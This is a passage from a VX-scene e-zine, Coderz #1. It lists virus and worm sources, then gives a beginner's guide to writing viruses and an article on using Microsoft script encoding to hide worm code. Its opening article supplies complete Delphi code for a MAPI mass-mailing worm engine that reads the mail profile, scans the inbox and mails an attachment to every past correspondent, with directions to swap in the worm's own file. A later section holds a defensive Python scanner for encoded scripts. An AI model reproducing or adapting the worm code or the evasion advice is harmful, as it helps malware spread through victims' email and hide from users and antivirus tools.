EZine - Coderz #1

Page 1: EZine - Coderz #1

Gigabyte's Introduction
Evul's Introduction

Articles

MAPI Worms in C++ and Delphi - HomeSlice
Viral Introduction - Gigabyte
Script encoding - Zulu
Some politically incorrect words about the so-called "scene" - Spanska
Faster Spreading - SnakeByte
AV-List - SnakeByte
Are Anti-Virus Companies Criminals? - SnakeByte
Some Tipz & trix for Win2k - Ratter
A few ideas for viruses - Kalkin/EViL
The protector scene - Kalkin/EViL
Katja Kladnik (Lucky Lady) - Richard Karsmakers, contributed by Al Leitch
Anti Avp Vbs I-Worms Detection - [K]Alamar
Retro the easy way - MidNyte
How to become the world's richest man - MidNyte
An Introduction to Encryption, Part III - MidNyte

Source Code

ASM

Win32.Infinite - Billy Belcebu/IKX
W9x.mATRiX - Lifewire/IKX
Dildo - T-2000/IR
Tequila - Disassembled by T-2000/IR
Bad Seed - Disassembled by T-2000/IR
Win95.Yildiz - Black Jack
CU.1076 - Disassembled by Black Jack
Win.Tentacle_II - Disassembled by Black Jack
Win32.DDoS - SnakeByte
Win32.CrashOverwrite - BeLiAL
One Half - Disassembled by Ratter

HLL

Win32.HLLP.Scrambler.b - Gigabyte
Win32.HLLP.STD - Error/Team Necrosis
Win32.HLLW.Hop_Along - Quilb

VBA & VBS

AM97.Lea - Knowdeth/Metaphase & NoMercyVirusTeam
WM97.NoBodyHears - AngelsKitten/NuKE
NETWORK/OUTLOOK.FakeHoax - Zulu
WM97.Neclovek - Lys Kovick/Metaphase
WM97.Unperson - Lys Kovick/Metaphase
HTML.MSBound - Suppa
WM97.LSD - WalruS
WM97/2K.Aida - e[ax]
WM97/2K.String - e[ax]
WM97/2K.String2 - e[ax]
WM97/2K.Blade - Necronomikon
WM97/Lithium - jackie
XM97/Fireal - jackie

Batch

HighHopes.c - Knowdeth/Metaphase & NoMercyVirusTeam
Fuck That 1.0a - Deloss/NuKE

Binaries

Win32.Infinite - Billy Belcebu/IKX
IRoK v1.1c - Raid/SLAM
Win32.HLLP.Scrambler.b - Gigabyte
I-Worm.Scooter - Gigabyte
Dildo - T-2000/IR
NETWORK/OUTLOOK.FakeHoax - Zulu
Win32.HLLP.Adrenaline - Anonymous
Win95.Yildiz - Black Jack
Showdown - GzR/NuKE
Prophecy - GzR/NuKE
Win32.CrashOverwrite - BeLiAL
Win32.HLLP.STD - Error/Team Necrosis
WordMacro.Blur.a - Knowdeth/Metaphase & NoMercyVirusTeam and AngelsKitten/NuKE

Interviews

Real Time Interview with Rajaat
Interview with Raid/SLAM, about Irok
Interview with The Unforgiven
Interview with Del Armg0/MATRiX
VX meeting 2000 in Czech Republic: Opinions of a few VXers

Tools

E-Z Disassembler & Dumper 1.0 - GzR/NuKE
Word97 VBA SR1 Generator ver 1.1k - Knowdeth/Metaphase & NoMercyVirusTeam

Humor

Kevin & Kell - Bill Holbrook, contributed by SnakeMan
The case of the stupid IRCop - Raid


Gigabyte's Introduction

Hey there..

What is this e-zine? Well, it's mainly an oversight of what's been going on in and around the VX scene the last year. The zine is completely contribution based, as this zine is made by Coderz.net, which isn't a group. I've seen Coderz.net grow from a fairly small website (being Evul's own homepage) to what it is now: A virus information site, hosting several (yeah, okay, shitloads) VX homepages. Maybe this is a moment to say, thanks Evul, for the time and effort you put into Coderz.net.

Thanks also go to:

Rajaat, Raid and The Unforgiven: For taking the time to answer the interview questions, Rajaat even in real life (writing the answers down in his hard to read kinda handwriting :)
GriYo, Benny, mort and Ratter: For answering the questions about the meeting.. and for the great time at the meeting itself of course :)
Roadkil: For HTML help.. and for testing my sunglasses with green and yellow letters on IRC :P
EXE-Gency and Del Armg0: For contributing another interview.
Everyone else who has contributed viruses, articles, etc.: This zine wouldn't be possible without you.

Greets:

Evul: Keep your dirty socks away from #virus! :)
Spyda: /me bites you :P
Queen: Males.. nothing but trouble, right?
Raid: How about we all smoke some weed and burn infected users with the hot ashes, hmm? :)
Darkman: Walking sex encyclopedia
Benny: Lying down on a used condom is not a good idea.. no, not even at a VX meeting! Unless you're called Benny..
Jackie Twoflower: Lz0#2 is nice :)
Rajaat: I still hate qwerty keyboards
T-2000: Fries and beer!
Vecna: Still can't dance?
Mandragore: Cheeseburgers :)
Several other people in the scene.. I won't fill a whole zine with just this list :)

Fuck you:

Virus-X (aka Trevelyan or Frieza)
Rhape79
Nala
The Bughunter (aka CWarrior)
Graham Cluley: You damn sexist


Evul's Introduction

Welcome to Coderz.Net zine issue 1.

After long delay, and lots of procrastination, here it is - humble as it may be. This zine is made up of submissions from many members of the VX scene, and edited in whole, by Gigabyte. We hope you enjoy this zine and coderz.net - and if all goes well, hopefully there will be an issue #2.

Coderz.Net was never meant to be what it has become - it simply happened. It started out as a simple homepage, and then a few sites were added, and from there it grew enormously. Over the last year it has been running on the average 80 websites, and taking traffic at rates of over 1.5 million page hits per month at times. I have done my best to make sure that the site is functional for users, and that the site stays up to date, however this has become quite a job lately, due to the size and demand of the site. Along with the normal troubles that come with such a site, Coderz has been through major technical problems, threatened, harassed, attacked, and run out of ISPs by the anger resulting from isolated incidents - yet at over two years of age, it's still here and doing fine.

The idea of starting a zine was kicked around for a while by myself, and I decided not to, for lack of time and patience to do so myself. A few months later, Gigabyte came to me about doing a zine for coderz, and after lots of ideas/debating she decided to take on the job and put together a zine herself .. great job, Gigs.

Back to the workload talked about earlier, we desperately need people willing to dedicate some time to helping with Coderz, so both the site and the zine may continue to grow and improve. Anyone who is interested in helping, we would be happy to hear from you. Email me at [email protected] if you would want to contribute. As part of the "live and learn" process involved in getting this zine out to you, we decided that if there is to be a #2, we will definitely need people to help with it. Contact Gigabyte ([email protected]) about the zine.

Once again, many thanks to Gigabyte for the hard work on this zine, and we apologise for the extended wait for this release.

Well, enough of my ramblings, go read the damn zine already!

Best Regards,
John

[email protected]


program mapiworm;

uses
  Windows, MAPI;

{$R *.RES}

(************** MAPI Worms in C++ and Delphi *********************

I haven't seen much documentation on writing a worm via Win32 HLL's so here goes. Nothing revolutionary, just simple API calls. This article is mainly aimed at the beginner, since actually researching this shit by hand is a major pain in the ass and time-consuming.

I'm showing the code in Delphi cause it's a bit easier to read and looks nicer than C++. Code can easily be converted to C in about thirty minutes, see Microsoft's MSDN section for a complete MAPI C++ example for the syntax. A ton of code can be snipped before inserting into your personal worm. I figure showing it in "long form" to be nice etiquette for an article-specific program.

This code was tested on NT 4.0, but might need a revision dependent upon your OS and how MAPI is setup. And before you laugh at 20k for just the worm engine, I checked AVP's site for MAPI and found some very large filesize worms doing moderately well in the wild:

I-Worm.PrettyPark: http://www.avp.ch/avpve/NewExe/win32/ppark.stm
I-Worm.ZippedFiles: http://www.avp.ch/avpve/worms/zipped.stm
I-Worm.WinExt: http://www.avp.ch/avpve/worms/WINEXT.stm
I-Worm.Plage: http://www.avp.ch/avpve/worms/Plage.stm

Couple of useful links:

Info on MAPI hook provider
http://support.microsoft.com/support/kb/articles/Q224/3/62.ASP

MAPI Address example
http://support.microsoft.com/support/kb/articles/Q126/6/58.asp

ReadMail example
http://support.microsoft.com/support/kb/articles/Q140/3/37.asp
*)

// Usage: HKEY_CURRENT_USER, 'Software\ImaFaggot', 'GayLesbian'
function regReadString(kRoot: HKEY; sKey, sValue: String): String;
var
  qValue: array[0..1023] of Char;
  DataSize: Integer;
  CurrentKey: HKEY;
begin
  RegOpenKeyEx(kRoot, PChar(sKey), 0, KEY_ALL_ACCESS, CurrentKey);
  DataSize := 1023;
  // RegQueryValueEx(CurrentKey, PChar(sValue), nil, nil, nil, @DataSize);
  RegQueryValueEx(CurrentKey, PChar(sValue), nil, nil, @qValue[0], @DataSize);
  RegCloseKey(CurrentKey);
  Result := String(qValue);
end;

var
  MAPIMessage: TMAPIMessage;
  lppMapiMessage: PMapiMessage;
  Recip, inRecip: TMapiRecipDesc;
  msgFile: TMapiFileDesc;
  MError: Cardinal;
  MapiSession, iMinusOne, i: LongInt;
  bWinNT, bFindFirst: Boolean;
  ProfileName, sAddress, sProfile, sSentMail: String;
  sSeedMessageID, sMessageID: array[0..512] of Char;
  os: TOSVersionInfo;

begin
  // Which Operating System we on?
  os.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  GetVersionEx(os);
  bWinNT := (os.dwPlatformId = VER_PLATFORM_WIN32_NT);

  // Grab default profilename from registry
  if (bWinNT) then
    ProfileName := regReadString(HKEY_CURRENT_USER,
      'Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles',
      'DefaultProfile')
  else
    // Standard Windows
    ProfileName := regReadString(HKEY_CURRENT_USER,
      'Software\Microsoft\Windows Messaging Subsystem\Profiles', 'DefaultProfile');

  // Fucking Delphi bug won't allow a -1 to be set
  // within the structure, so we trick it
  iMinusOne := -1;
  // Will hold any previous recipients
  sSentMail := '';

  // Logon to MAPI. If no workie, get outta here
  try
    MError := MapiLogOn(0, PChar(ProfileName), nil, MAPI_NEW_SESSION, 0, @MapiSession);
    if (MError <> SUCCESS_SUCCESS) then
      Exit;
  except
    ;
  end;

  // Fill in the file structure with our attachment
  with msgFile do
  begin
    ulReserved := 0;
    flFlags := 0;
    nPosition := iMinusOne; // Let Outlook handle the file position
    // Obviously, replace the INI with your worm's path/filename
    lpszPathName := PChar('c:\windows\system.ini');
    lpszFileName := nil;
    lpFileType := nil;
  end;

  bFindFirst := True;

  // Walk through first fifty messages
  for i := 1 to 50 do
  try
    // Keep up with our MessageID
    if (bFindFirst) then
    begin
      sSeedMessageID := '';
      bFindFirst := False;
    end
    else
      sSeedMessageID := sMessageID;

    // Find a message
    // MapiFindNext serves as both a "findfirst/findnext" function, dependent
    // upon if MessageSeed has a value
    MError := MapiFindNext(MapiSession, 0, nil, @sSeedMessageID, 0, 0, @sMessageID);
    if (MError = SUCCESS_SUCCESS) then
    begin
      // Obtain the long pointer
      lppMapiMessage := @MAPIMessage;
      // Open for Reading, headers only (both faster, and avoids
      // writing all the god damned attachments to temp directory)
      MError := MAPIReadMail(MAPISession, 0, @sMessageID,
        MAPI_ENVELOPE_ONLY, 0, lppMapiMessage);
      if (MError = SUCCESS_SUCCESS) and (lppMapiMessage.lpRecips <> nil) then
      begin
        // Sets info about message recipient
        with Recip do
        begin
          ulReserved := 0;
          ulRecipClass := MAPI_TO;
          sAddress := 'SMTP:' + lppMapiMessage.lpRecips.lpszAddress;
          lpszAddress := PChar(sAddress);
          lpszName := lppMapiMessage.lpRecips.lpszName;
          ulEIDSize := 0;
          lpEntryID := nil;
        end;

        // Clear out to avoid any leftover setting
        FillChar(MAPIMessage, SizeOf(MAPIMessage), 0);
        // Fill the MapiMessage structure.
        // Unnecessary to expand entire struct, but aesthetically pleasing
        with MapiMessage do
        begin
          ulReserved := 0;
          lpszSubject := PChar('Insert subject for message');
          lpszNoteText := PChar('Message text goes here');
          lpszMessageType := nil;
          lpszDateReceived := nil;
          lpszConversationID := nil;
          flFlags := 0;
          lpOriginator := nil;
          nRecipCount := 1;
          lpRecips := @Recip;
          nFileCount := 1;
          lpFiles := @msgFile;
        end;

        // Send the message
        if (Pos(lppMapiMessage.lpRecips.lpszAddress, sSentMail) = 0) then
        begin
          MError := MapiSendMail(MapiSession, {handle} 0, MapiMessage, 0, 0);
          // Store this address, so no duplicate messages are sent
          sSentMail := sSentMail + lppMapiMessage.lpRecips.lpszAddress;
        end;
      end;
    end;
  except
    ; // Process your errors like a man
  end;

  try
    MError := MapiLogOff(MapiSession, 0, 0, 0);
  except
    ;
  end;
end.


Gigabyte

Explanation of some words.

Before I start, I will explain some words. You will probably not only see these words in Viral Introduction, you might see them in the rest of the zine as well.

VX: Virus eXchanging. VXers are those who are pro-virus, collect viruses, write them, exchange them..

AV: Anti Virus. They make virus scanners. Examples are: Anti Viral Toolkit Pro, Norton Antivirus, McAfee...

IRC: Internet Relay Chat. People use it to chat, to communicate. There are many different IRC servers, Undernet for example.

IRC client: What people use to connect to an IRC server. Examples are: mIRC, PIRCH, Xircon, VIRC..

ASM: Assembly language. This language is most used to code viruses in.

TASM: Turbo Assembler. This is most used in the VX scene to assemble ASM source code into executable files. (Requires TLINK)

VBA: Visual Basic for Applications. It's a part of the Microsoft Office products.

VBS: Visual Basic Scripting language. Can be inside an HTML page. (For more information see the part about script viruses in "What is:", further down in this document.)

Where to find information about viruses and collecting?

Well, I think I should give you some links to virus sites to begin with. Your first stop for finding any VX site should be coderz.net. Check the "Hosted pages" part, you'll find many interesting sites on coderz.net, and they might contain other links to VX sites elsewhere.

Coderz.net
29A
#virus Homepage
Virus Trading Center
Tally's Virus Link Reference

If you're looking for IRC channels about viruses, you could come to #vir and #virus on Undernet. Watch out: NEVER ask or beg for viruses, you'll get kicked out. And DON'T TURN THE CAPS LOCK ON LIKE THIS, it's annoying, and it looks like you're yelling all the time, or you'll get kicked out. Viruses can be found on the net, if you put in a bit of effort. If you can't be bothered, or haven't got the intelligence to find even a few, then you're not likely to be helped out. People in the scene will gladly help you out if you put in the effort first to prove you're not just going to infect someone's computer. They need to know you're interested in learning.

In which language are viruses written?

Mainly in Assembler (ASM), but there are also macro-viruses, which are made in Visual Basic for Applications (VBA). VBA is a part of the Microsoft Office products. There are viruses that are written in other languages, but they're a rarity. Newer is VBS, a scripting language that can be used for making worms or viruses.

How to learn how to write viruses?

If you wanna learn how to write viruses, you might want to read a tutorial. There are some tutorials in VDAT, for example. VDAT contains a lot of information about viruses, VXers, VX groups and also tutorials about how to write viruses. You can find answers to all kinds of virus-related questions in VDAT, you can find some VX history, etc. One warning about VDAT though: it's currently nearly 10Mb and can take a long time to download. It is definitely worth it though. Also, yes it is an exe, yes it is made by someone interested in viruses, but NO, it is not a trojan as I have been asked before. If you were going to write a trojan, would you make it 10Mb? I guess you'll have to trust me on that :)

Download VDAT from:

Coderz.net's FTP

And also the Codebreakers magazines are good.

Get them from:

Codebreakers

or

Coderz.net's FTP

(Most of their tutorials can be found in VDAT)

Don't be discouraged when you start out coding, once you get the hang of the simple parts you can go at your own pace with the rest.

For which words to search when looking for viruses or information about viruses?

Search for: virus, viruses, virii, VX, computervirus. The best search engine to use is http://www.hotbot.com for an exact match. This can be useful when URLs of virus sites I gave you are down.

How to get into the VX scene?

You can meet VXers on IRC. Try #vir and #virus on Undernet. Read some tutorials (see "How to learn how to write viruses?"). Have some patience. You have to get to know the people and they have to get to know you. And learning how to code viruses might also take some time. If you have questions, first look if you can find the answer in VDAT before asking. Start with the first tutorial, not with the last. Don't go to the next until you've finished.

Is it illegal?

That depends on the country you live in. Usually writing viruses isn't illegal, exchanging isn't illegal either, but spreading is. So if you send someone a virus without informing the person that it's a virus, that would be considered spreading. Always check your country's laws before doing anything virus-related. Governments don't generally understand you can be interested in a virus without needing to spread it; if you have a virus they assume you intend to spread it.

Why do people write viruses?

There can be many reasons: challenge, fame, buck authority, they want to do something different..

What is:

an overwriter: A virus that completely overwrites files to infect them, so it doesn't save the original file. This is what you start with when you learn to code viruses. The host file is completely destroyed so the virus is noticed almost immediately. Have a look at Codebreakers magazine #1, or SLAM magazine #2.

an appender: A virus that saves the parts of the infected file that are changed, then writes itself to the end of the host program. At the end of the virus is some code to restore the program (in memory only) and run it. Because the host program still works, your virus has a better chance of going unnoticed than an overwriter. This is explained in Codebreakers magazine #2 or SLAM magazine #3.

a prepender: A prepending virus will write itself to the start of a program instead of the end. This has the advantage of not requiring a calculation called the 'delta offset'. Don't worry about this yet, the tutorials will explain it when you get there, I just mention it so you know that there is a difference between a prepender and an appender.

encryption: Encryption is a way to hide the true function of your virus code, and any messages contained in it. An encrypted virus has a decryptor at the start that decrypts the rest of it then passes control to the now unencrypted part.

polymorphism: A virus that creates a completely different decryptor every time, to avoid the AV being able to make a scan-string for the virus.

TSR: A virus that stays resident in memory. This can be particularly effective, because any program even listed in a 'DIR' command can be infected by a TSR virus.

bootsector: A bootsector is the part of the disk that is read automatically when the computer starts and loads the operating system. A virus that infects here can load before the operating system, and therefore before any AV program can be installed in memory.

a macro-virus: Infects MS Office documents, is written in VBA. An example is the Melissa virus.

a script virus: A virus made in JavaScript or VBS. Those languages can be used inside an HTML page, so the virus can be inside the HTML page. That's why they're sometimes called HTML viruses. VBS is also called 'Winscript'. Scripting languages are also good to make worms in. An example is Bubbleboy.

How to get recognized?

Have patience.. I hope, after you have read Viral Introduction, you've found the information you were looking for, know where to look for tutorials and virus sites and that you know what the VX scene is.

Good luck,

Gigabyte

Thanks a lot to MidNyte, for all the help with the article and suggestions, and to Spyda for the 'Viral Introduction' picture.


Script encoding

09/09/2000

Hi all.

First, when reading this, consider that English is not my native language, so expect some mistakes in the text. :)

I was going to submit my last worm for the zine, but well, instead of that I decided to write some things about encoded scripts (JScript/VBScript) and only use that worm as an example. With this I mean Microsoft's encoding, not other manual ways of encoding or making your code harder to read.

So this is my first article for a zine, most of my viruses/worms were included in many, but just that, not real articles or tutorials.

Script encoding in HTML files

Script encoding started with Internet Explorer 5. At that time it was possible to use the "<script>" tag of HTML files to write scripts in JavaScript, JScript or VBScript, but this version added new values for the "language" property of that tag, those values were "JScript.Encode" and "VBScript.Encode".

Examples:

<script language="JScript.Encode">

<script language="VBScript.Encode">

I said that Internet Explorer 5 started this because it included version 5 of both JScript and VBScript, which are the ones that included this new feature.

For encoding your script you need Script Encoder which is available from http://msdn.microsoft.com/scripting. This Win32 command line program will read your HTML file with a script tag having "VBScript" as its "language" value and it will write a new HTML file with your code encoded and with the "language" attribute changed to "VBScript.Encode". A similar thing happens when using JScript.

For example, something like this:

<script language="VBScript"> MsgBox "Example"</script>

Will be changed to:

<script language="VBScript.Encode">#@~^GgAAAA==@#@&P~t/TAWXPr36m:2VJ@#@&7gUAAA==^#~@</script>

Have in mind that this encoding is really designed for casual readers of your code, the truth is that it's trivial and will not protect your code from people that are determined to view it.

Of course these things are only supported in Internet Explorer, not in other browsers. Script languages are not part of the HTML language, not even the "language" attribute is part of HTML 4, the correct attribute would be "type", but well, that is another matter that is not virus related.

At the time of writing this I know only one virus using this feature in HTML files, it is HTML.Lanus which I wrote some time ago. Anyway, I explained script encoding in HTML files to show how it was possible, but as we know, HTML files are not a real target for viruses since scripting in them needs authorization from the user when using most needed objects unless we are using some kind of bug to skip the warning message.

Script encoding in Windows Script Host

Windows Scripting Host 1 (also known as WSH in this text) was included for the first time in Windows 98. It supported JS (JScript) and VBS (VBScript) files to do scripting, and with this, a new type of viruses was started by Lord Natas. No encoding was possible.

Some time later Windows Scripting Host changed its name to Windows Script Host and version 2 was out. One of the things that this new version added was the possibility of encoding our scripts like it was possible with HTML files by using two new extensions, JSE and VBE. JSE are JS files after using the encoder, the same happens with VBE and VBS.

Using the encoder with JS and VBS files is the same as with HTML files: it reads a VBS file with our script and it creates a VBE file which has our encoded script.

NETWORK/OUTLOOK.FakeHoax

NETWORK/OUTLOOK.FakeHoax is an example of script encoding in Windows Script Host. It is the first virus/worm using the JSE and VBE extension (at least not as auxiliary files), so it has two versions, one in JScript and the other in VBScript.

It uses OUTLOOK and the network shares for spreading. The main code is a COM object written in XML and VBScript using Windows Script Component, so the code in the JSE and VBE file is trivial. Both versions create a WSC file (the COM object defined in XML) and then both call methods and change properties of that object, no real spreading code is in those files.

The worm was written in this way to make it easier to port it to any other language, this way I was able to create a JSE and a VBE file without really porting the main code. Also, it's possible to create new versions using Delphi, Visual C++, or any other by using "REGSVR32.EXE" to register the WSC file as a COM object before calling its methods or changing its properties.

This worm was written to show how JSE and VBE files could be used in viruses/worms, since before this they were only used as auxiliary files (some versions of HTML.rahC by 1nternal and OUTLOOK.Monopoly by me for example). Besides, since it needs Windows Script Host 2 or later, it won't be good at spreading itself at the time of writing this.

Also, this was a good opportunity for using Windows Script Component for the first time because it made it possible to write a JScript and a VBScript version without needing to port the whole code, so this is also the first virus/worm using its own COM object.

NETWORK/OUTLOOK.FakeHoax text file including source code: network_outlook.fakehoax.txt.
NETWORK/OUTLOOK.FakeHoax ZIP file (text file and working copies of the worm): network_outlook.fakehoax.zip.

Script encoding support

When writing viruses you must know in which systems your code will work. Even though script encoding is not new, it was not a valid feature for viruses since not many systems supported it. But this is changing these days and encoding is now possible for a worm with good spreading capabilities.

Script encoding in HTML files: supported in any system with JScript/VBScript 5+ (included in Internet Explorer 5+).

JSE and VBE files: supported in any system with Windows Script Host 2+ (included in Windows 98 SE, Windows 2000 and Windows Me).

Also, JScript/VBScript 5+ and Windows Script Host 2+ can be installed as separate packages. For example, an encoded script in a HTML file could be run in Internet Explorer 4 if the JScript/VBScript 5+ separate package is installed.

Trick to run JSE and VBE files in systems with WSH version 1

By using a trick I found, JSE and VBE files can be run in systems with WSH version 1 instead of version 2 if JScript/VBScript 5+ is installed.

Let's see an example: a system has Windows 98 (not Windows 98 SE) and Internet Explorer 5 installed. The WSH 2+ separate package was not installed. So this system has WSH 1 and JScript/VBScript 5, since WSH 1 was included with that Windows version (unless it was not selected in a custom installation) and JScript/VBScript 5 was included with Internet Explorer 5. This system is able to understand encoded scripts, it just doesn't have the JSE and VBE extension support. So to run a JSE or VBE file we can create a WSH file that calls the encoded script.

This means that instead of running a VBE file directly (not possible in the example), we can run a WSH file (which is supported in WSH 1) that runs a VBE file.

This method was used in OUTLOOK.Monopoly, the worm was a VBS file that created a WSH and a VBE file and then ran the WSH file, so the main code was encoded and it worked in the first edition of Windows 98 with Internet Explorer 5 installed. WSH 2+ was not needed in this worm.

I won't explain how WSH files work, to know more about them, create a JS file and then view its properties, changing some of them will create a WSH file in that same directory. Then view it and play with those values. :)

Other file types in which script encoding may be used

Script encoding can be used in any file format that accepts the "<script>" tag. Anyway some file formats like WSC and WSF are not supported by the current version of Script Encoder, but you can include encoding in those file types by creating the "<script>" tag in a HTML file and then copying the encoded code to the WSC or WSF file. Script Encoder recognized extensions are ASA, ASP, CDX, HTM, HTML, JS, SCT and VBS.
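As an added example (not part of Zulu's article or any of his worms), a small Python scanner that flags the Script Encoder artefacts the HTML and WSH sections above describe: the JScript.Encode/VBScript.Encode language attribute, the "#@~^ ... ^#~@" block markers from the encoded MsgBox sample, the JSE/VBE extensions, and a WSH launcher file whose Path points at an encoded script (the WSH 1 trick). The INI layout of the .wsh file (a [ScriptFile] section with a Path key) is an assumption stated in the code; all sample inputs are constructed.

```python
"""Flag files carrying or launching Microsoft Script Encoder output (added example).

Marker layout, as visible in the encoded sample from the article:
    #@~^GgAAAA==   <encoded body>   7gUAAA==^#~@
"#@~^" + six base64 characters (length field) + "==" opens a block;
six base64 characters (checksum field) + "==" + "^#~@" closes it.
"""
import re
from pathlib import PurePosixPath, PureWindowsPath
from typing import Dict, List, Optional

START_MARKER = re.compile(r"#@~\^[A-Za-z0-9+/]{6}==")
END_MARKER = re.compile(r"[A-Za-z0-9+/]{6}==\^#~@")
# <script ... language="JScript.Encode"> or language=VBScript.Encode (quotes optional)
ENCODE_LANGUAGE = re.compile(
    r"<script[^>]*\blanguage\s*=\s*[\"']?(?:JScript|VBScript)\.Encode", re.I)
ENCODED_EXTENSIONS = {".jse", ".vbe"}


def wsh_target(content: str) -> Optional[str]:
    """Return the Path= value from the [ScriptFile] section of a .wsh launcher.

    Assumption: the .wsh file uses the INI layout with a [ScriptFile] section.
    """
    section = None
    for raw in content.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "scriptfile" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "path":
                return value.strip()
    return None


def classify(name: str, content: str) -> List[str]:
    """Return the reasons a file looks like it carries or launches an encoded script."""
    reasons = []
    ext = PurePosixPath(name).suffix.lower()
    if ext in ENCODED_EXTENSIONS:
        reasons.append(f"{ext} extension: encoded WSH script (needs WSH 2+)")
    if ENCODE_LANGUAGE.search(content):
        reasons.append("script tag declares JScript.Encode/VBScript.Encode")
    starts = START_MARKER.findall(content)
    ends = END_MARKER.findall(content)
    if starts:
        reasons.append(f"{len(starts)} Script Encoder block(s) (#@~^ ... ^#~@)")
        if len(ends) != len(starts):
            reasons.append("start/end marker mismatch: truncated or hand-edited block")
    if ext == ".wsh":
        target = wsh_target(content)
        if target and PureWindowsPath(target).suffix.lower() in ENCODED_EXTENSIONS:
            reasons.append(f"WSH launcher runs encoded script {target} (works on WSH 1)")
    return reasons


def scan(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every (name, content) pair; an empty list means nothing was flagged."""
    return {name: classify(name, content) for name, content in files.items()}


# Constructed samples; the HTML one reuses the encoded MsgBox "Example" from the article.
SAMPLES = {
    "hello.html": '<script language="VBScript.Encode">'
                  '#@~^GgAAAA==@#@&P~t/TAWXPr36m:2VJ@#@&7gUAAA==^#~@</script>',
    "plain.vbs": 'MsgBox "Example"',
    "run.wsh": "[ScriptFile]\r\nPath=C:\\Temp\\main.vbe\r\n[Options]\r\nTimeout=0\r\n",
    "cut.vbe": "#@~^GgAAAA==@#@&P~t/TAWXP",
}

if __name__ == "__main__":
    for name, reasons in scan(SAMPLES).items():
        print(name, "->", "; ".join(reasons) if reasons else "nothing flagged")
```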

Script encoding and viruses

You can use this feature in HTML viruses/worms even though they are not something very interesting, or you may use it in worms in JSE or VBE format, which will be better methods.

Normal viruses in JSE and VBE format are not interesting since it would be like JS and VBS viruses, there are not many files to infect since they are not used much by people, well, maybe you can find lots of them in my computer since I'm so crazy about scripting and I use it for lots of simple tasks, but most users don't use WSH. :) Also, encoding won't make a file simple to infect, since it would be necessary to decode it, infect it and then encode it again.

These days there are a lot of worms in VBS files (the same is not happening with JScript ones), well, all these worms could be easily encoded.

Encoding VBS files will have two advantages:

1) The code will be encoded, so it will be harder to read and most users won't do that.
2) VBS files are a known target for worms, but VBE files are not. So the VBE extension is far better for them.

But there are also two disadvantages:

1) Some old systems may not be able to run VBE files.
2) The script will be a few bytes bigger. But they are only a few so this is not really a big disadvantage.

Well, that's all, let me know in case of any error you find about technical things or for any question you have.

Bye all.

[email protected]
http://coderz.net/zulu


Some politically incorrect words about the so-called "scene"

[by Spanska, written for Coderz.net e-zine]

- Ethnographic introduction

Virus writers and all people classified globally under the "Vx" label are an interesting population to observe. Especially if you can have a look from the inside, and, at the same time, if you're not involved enough, in order to be able to see the "scene" from an independent and exterior point of view. I think I qualify here. I've been around for a few years, met some coders in real life, wrote some viruses, but at the same time I was never a member of any group, I'm old enough to be able, I hope, to think with some distance, and these last months I basically had better things to do than to write code.

- Don't ask "How much time you spend on IRC?", but ask "Show me your code!"

The main problem of the "scene" can be spelled in three letters: IRC. I'm impressed tosee how people spend so much time chatting about everything except virus codingtechniques. They think that to be a real virus writer, you need to be accepted in somevirus channel, and then spend twelve hours a day there. High dosis of IRC induces asort of twist in reality perception, because people behave there very differently from reallife. How many people we saw, and we will see, very proud of their brand new op,kicking, banning, laughing about infected users, acting as some powerful agressive elite.Even if they never produced one single line of code. Even if they never did anythinguseful for the Vx community. Even if their only production is a twenty line macro-virus.Even if they have to go to school the day after, where they will not be "DarkLordz" or"KillerGod" anymore, but normal average teens who have to do their homework. If youthink you're a mature person, and i guess most of us are, behave as a mature personeven on IRC.

You may think I exaggerate when I talk about this twist of reality. Unfortunately, I can cite lots of examples. Let's take one that everybody has heard about. A coder, no need to give his nickname, according to his own words sent logs to some anti-virus people showing that another coder was actively spreading viruses, in order to "protect one or two channels from being deleted by Undernet". Basically, that means that the existence of IRC channels is more important than a real person's life, because, unfortunately, nowadays spreading viruses can lead directly to some years in jail, depending on the laws of your country, which means a destroyed life. Just to "save a channel". You see the twist. I am pretty sure the guy in question now recognises the big error he made, and I hope he learnt from it, but anyway, it is too late.

This example was of course somewhat unique in its importance, but it is typical of a state of mind that is very widespread in the Vx community. People think an op is the most important thing in life. They think their rank in the channel's bot is the only thing that matters, proportional to their eliteness. Twist again. Importantly, this changes the communication and the behaviour between people. Who is going to criticise the owners of their favourite channels, or, more generally, people with a higher level? This leads to hypocrisy, which is very widespread in the community.

I have seen too many examples of guys and girls spending so much time on IRC that everything that happened there, even the most anecdotal fights, took on a huge importance. Let me tell you: if you need a computer and a connection to feel human emotions like pain, anger, friendship or love, something is wrong. Really.

IRC has another problem. It is dangerous. It seems that Vx people never learnt the lessons of the Melissa case. They don't care about encryption, they don't care about remailers, they don't care that what they say on-line can be used to profile or trace themselves or, even more importantly, some of their friends. They keep megabytes of sensitive IRC logs and old mails. They just don't care until the worst happens. Virus writing and spreading is no longer a funny game. It is a dangerous criminal activity, and you have to take that fact into account, especially if you spread your viruses or have friends who do. This is the main revolution in Vx land in recent years. Now they are seriously after us. And nobody cares.

- Vxers as crickets

Let's talk about another interesting behaviour in the Vx scene: the flocking into groups. It is funny how people who repeat so often that they are independent, or think differently, do everything they can to join or create some clan of similar people, and then be proudly tagged as a member of a larger entity known as a Vx group, with its own set of new rules and laws they have to conform to. Like sheep. The analogy is not just a cheap provocation. It is a very old animal behaviour. Individuals are weak; if they flock, they are stronger against all possible enemies, or at least they feel stronger. Crickets are a good example: whenever they form a very large group, their behaviour changes completely and they become much more aggressive. They are no longer afraid of predators. It is very funny to see the same kind of basic animal regression in Vx crowds.

Or maybe it is just to get some form of recognition. People with no skill, or people afraid to learn (we were all lamers on day zero, we should not forget that) know that they will never be accepted in the community on their own merits. So they need a sort of official tag to prove to others, and maybe even more to themselves, that they are part of the Vx scene. This mark is provided by membership in some group, which provides, easily and quickly, an official entrance ticket into the scene. No need to produce anything useful now: you are already inside the community, even if by a totally artificial route.

